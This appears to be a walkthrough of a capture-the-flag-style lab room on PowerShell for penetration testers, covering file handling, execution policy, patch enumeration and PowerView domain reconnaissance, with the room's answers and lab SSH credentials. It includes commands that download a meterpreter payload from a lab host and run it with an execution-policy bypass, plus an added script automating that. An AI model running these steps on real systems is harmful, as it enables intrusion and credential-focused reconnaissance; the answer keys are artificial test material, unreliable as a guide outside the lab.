Powershell for Pentesters
This room covers the principal uses of PowerShell in penetration tests. Interacting with files, scanning the network and system enumeration are covered.
This room can be found here. This section will cover the basics of PowerShell that will be useful in any engagement.
Target machine SSH credentials:
Username: walter
Password: Kowacs123!
Once logged in over SSH, we can run powershell to access PowerShell.
Most of the command-line portions of pentest training focus on Linux, but most corporate systems run Windows, so it is important that a red team member feels at home in both operating systems.
There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang. The downside to these and similar scripts is that they are detected by most AV (antivirus) software.
powerview.ps1
- dir on Walter's desktop lists the files and gives the answer.
Start-Process
- Used to start a process, such as notepad.
Get-Process
- Lists all running processes. Can also be used with the -Name parameter to filter for a specific process.
(command) | Export-Csv -Path (File).csv
- Exports the objects produced by the previous command to a .csv file, which may be easier to read or to import into another tool.
Get-Content
- Shows the contents of a file. Similar to the cat command on Linux.
Copy-Item
- Copies an item (file or directory) to a new location.
Move-Item
- Moves an item (file or directory) to a new location.
Get-FileHash
- Obtains the hash of the specified file. SHA256 is the default; use -Algorithm MD5 (or SHA1) for other hash types.
501570FFBA7FACE69D61DA1A0843E89A
- Obtained with Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1
There are multiple ways to download files from a server using PowerShell. One of the quickest is the WebClient class and its DownloadFile method.
(New-Object System.Net.WebClient).DownloadFile('URL/File', 'Output-File')
Example: (New-Object System.Net.WebClient).DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')
This will connect to the host 10.0.2.8 and download the meterpreter-64.ps1 file. The file is then saved as "meterpreter.ps1".
Another method is Invoke-WebRequest with the -OutFile parameter:
Invoke-WebRequest "URL/File" -OutFile "File"
Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"
Once we have the file downloaded, we can run it, but we may run into an ExecutionPolicy issue. Microsoft has stated that ExecutionPolicy is NOT a security feature; it functions as a safety measure against running scripts by accident and can be bypassed by the user.
The current state of the ExecutionPolicy configuration, for every scope, can be seen using Get-ExecutionPolicy -List
Execution policies can have seven different values:
AllSigned
- Scripts can run, but every script (local or downloaded) must be signed by a trusted publisher.
Bypass
- All scripts can run, and no warnings or prompts will be displayed.
Default
- Refers to Restricted on Windows clients and RemoteSigned on Windows servers.
RemoteSigned
- Scripts downloaded from the internet must be signed by a trusted publisher; local scripts do not need to be signed.
Restricted
- The default configuration for Windows clients. Allows individual commands to run, but does not allow scripts.
Undefined
- No execution policy is set in this scope, so the default policy is enforced.
Unrestricted
- Unsigned scripts can run; a warning is shown before running scripts downloaded from the internet.
We have several alternatives to bypass the ExecutionPolicy, but some methods require the user to have administrator privileges. The most common way is to launch powershell.exe with the policy set on the command line (-Exec is an accepted abbreviation of -ExecutionPolicy):
powershell -ExecutionPolicy Bypass -File .\(File)
Example: powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1
powershell -Exec Bypass -File .\(File)
Example: powershell -Exec Bypass -File .\meterpreter.ps1
We can also change the ExecutionPolicy for the current process only, using Set-ExecutionPolicy Bypass -Scope Process, and then attempt to run the file. The Process scope does not require administrator rights and does not touch the machine or user setting.
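The steps above (download, check the hash, relax the policy for this process, load the script) are combined here into two small functions. This is an added example and is not code from the room: the function names are mine, the URL and the expected hash in the usage lines are placeholders, and it assumes you recorded the SHA256 of the script on your attack box before serving it, so that a truncated or tampered download is caught before it is loaded.

```powershell
# Added example (not from the room). Fetch a script, verify its SHA256 with
# Get-FileHash, then load it with a process-scoped execution-policy bypass.

function Get-VerifiedScript {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Url,            # placeholder in usage below
        [Parameter(Mandatory)] [string] $OutFile,
        [Parameter(Mandatory)] [string] $ExpectedSha256  # recorded on the attack box
    )

    # Same cmdlet the room uses; -UseBasicParsing avoids the IE-engine dependency
    # on older Windows PowerShell versions.
    Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing

    # Get-FileHash defaults to SHA256. -ne on strings is case-insensitive, so
    # upper/lower-case hex both compare correctly.
    $actual = (Get-FileHash -Algorithm SHA256 -Path $OutFile).Hash
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -Path $OutFile -Force   # do not leave a bad copy behind
        throw "Hash mismatch for $OutFile : expected $ExpectedSha256, got $actual"
    }
    return (Resolve-Path -Path $OutFile).Path
}

function Import-ScriptWithBypass {
    [CmdletBinding()]
    param([Parameter(Mandatory)] [string] $Path)

    # Only the Process scope is changed; machine and user policy stay as they are.
    if ((Get-ExecutionPolicy -Scope Process) -ne 'Bypass') {
        Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
    }
    # Dot-sourcing loads the script's functions into the current session, which
    # is what Import-Module .\powerview.ps1 achieves later in the room.
    . $Path
}

# Usage (placeholders: substitute your own host, file and recorded hash):
# $script = Get-VerifiedScript -Url 'http://10.0.2.8/powerview.ps1' `
#                              -OutFile '.\powerview.ps1' `
#                              -ExpectedSha256 '<sha256 recorded on the attack box>'
# Import-ScriptWithBypass -Path $script
```

Running the block only defines the two functions; nothing is downloaded until the usage lines are executed. If Get-ExecutionPolicy -List shows the Process scope already at Bypass (for example because the shell was started with powershell -Exec Bypass), the Set-ExecutionPolicy call is skipped.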
Get-Hotfix
- Enumerate already installed patches
Get-Hotfix | Format-list | findstr InstalledOn
Get-Hotfix | Format-Table HotFixID
Format-List
- Displays every property of each object, one per line, so more information is visible than in the default table view.
dir | Format-List
Out-File
- Used to save the output to a file for further use
Get-Hotfix | Out-File Hotfixes.txt
KB4499728
- Get-HotFix gives us our answer.
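The Get-HotFix, Format-*, Out-File and Export-Csv pieces above can be put together into one enumeration step that sorts patches by install date and flags any KB you expected to find. This is an added example, not code from the room: the function name and parameters are mine, the CSV path is whatever you pass in, and it must run on the Windows target because Get-HotFix reads the local Win32_QuickFixEngineering data.

```powershell
# Added example (not from the room). Summarise installed patches instead of
# grepping Format-List output with findstr.

function Get-PatchSummary {
    [CmdletBinding()]
    param(
        [string]   $OutCsv,          # optional: write the full list here, e.g. .\hotfixes.csv
        [string[]] $CheckKB = @()    # optional: KB IDs you want confirmed as installed
    )

    # InstalledOn is a [DateTime] (or $null on some entries), so Sort-Object
    # orders it properly; newest patch first.
    $hotfixes = Get-HotFix |
        Select-Object HotFixID, Description, InstalledOn |
        Sort-Object InstalledOn -Descending

    if ($OutCsv) {
        $hotfixes | Export-Csv -Path $OutCsv -NoTypeInformation
    }

    # Newest entry that actually carries a date.
    $latest  = $hotfixes | Where-Object { $_.InstalledOn } | Select-Object -First 1
    # Any requested KB that is not in the installed list.
    $missing = $CheckKB | Where-Object { $_ -notin $hotfixes.HotFixID }

    [pscustomobject]@{
        HotfixCount    = @($hotfixes).Count
        LatestKB       = $latest.HotFixID
        LatestInstall  = $latest.InstalledOn
        DaysSincePatch = $(if ($latest) { [int]((Get-Date) - $latest.InstalledOn).TotalDays } else { $null })
        MissingKB      = ($missing -join ',')
    }
}

# Usage: full list to CSV, and confirm the KB asked about in the room is present.
# Get-PatchSummary -OutCsv .\hotfixes.csv -CheckKB 'KB4499728'
```

A large DaysSincePatch value, or a non-empty MissingKB, is the quick signal that the host is behind on patching; the CSV keeps the full evidence for the report.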
PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from here.
Once we download the file, we need a shell whose execution policy allows the script, then import the module. Note that powershell -Exec Bypass .\powerview.ps1 would run the script in a child process that exits immediately, so the functions would not be available afterwards; start a new shell with the bypass policy first and import inside it:
powershell -Exec Bypass
Import-Module .\powerview.ps1
With PowerView imported, we can use it to obtain information on the domain configuration and its users.
Get-NetDomainController
- Collect information on the domain controller
Get-NetUser
- Provides a list of domain users. Depending on the size of the company, we may want to output this to a .csv file.
Get-NetUser | select -ExpandProperty lastlogon
- Extends the command above to show each user's last logon date/time.
Get-NetComputer
- Enumerate systems connected to the domain
Get-NetGroup
- Enumerate Existing Groups
Get-NetGroupMember "Domain Admins"
- Lists the members of the "Domain Admins" group.
Find-DomainShare
- Lists available shares
Get-NetGPO
- Gather information on enforced policies through Group Policy.
Find-LocalAdminAccess
- List systems in the domain you may access as a local administrator
IDF-17828290
- Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol gives us the details. We can of course add further properties as we see fit.
4
- Counting the users in the previous screenshot/command gives us our answer.
3
- Get-NetGroupMember "Domain Admins" gives us our answer.
usand, ssilk, ServerAdmin
- The previous command and screenshot give us our answer.
operationfiles
- Find-DomainShare -CheckShareAccess lists the accessible shares; most look normal except this one.
Disable WinDef
- Running Get-NetGPO -properties displayname shows the list of Group Policy display names.
Daniel, Ursula
- Looking at our previous command, Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol, we can see each user's first and last name and which ones are disabled.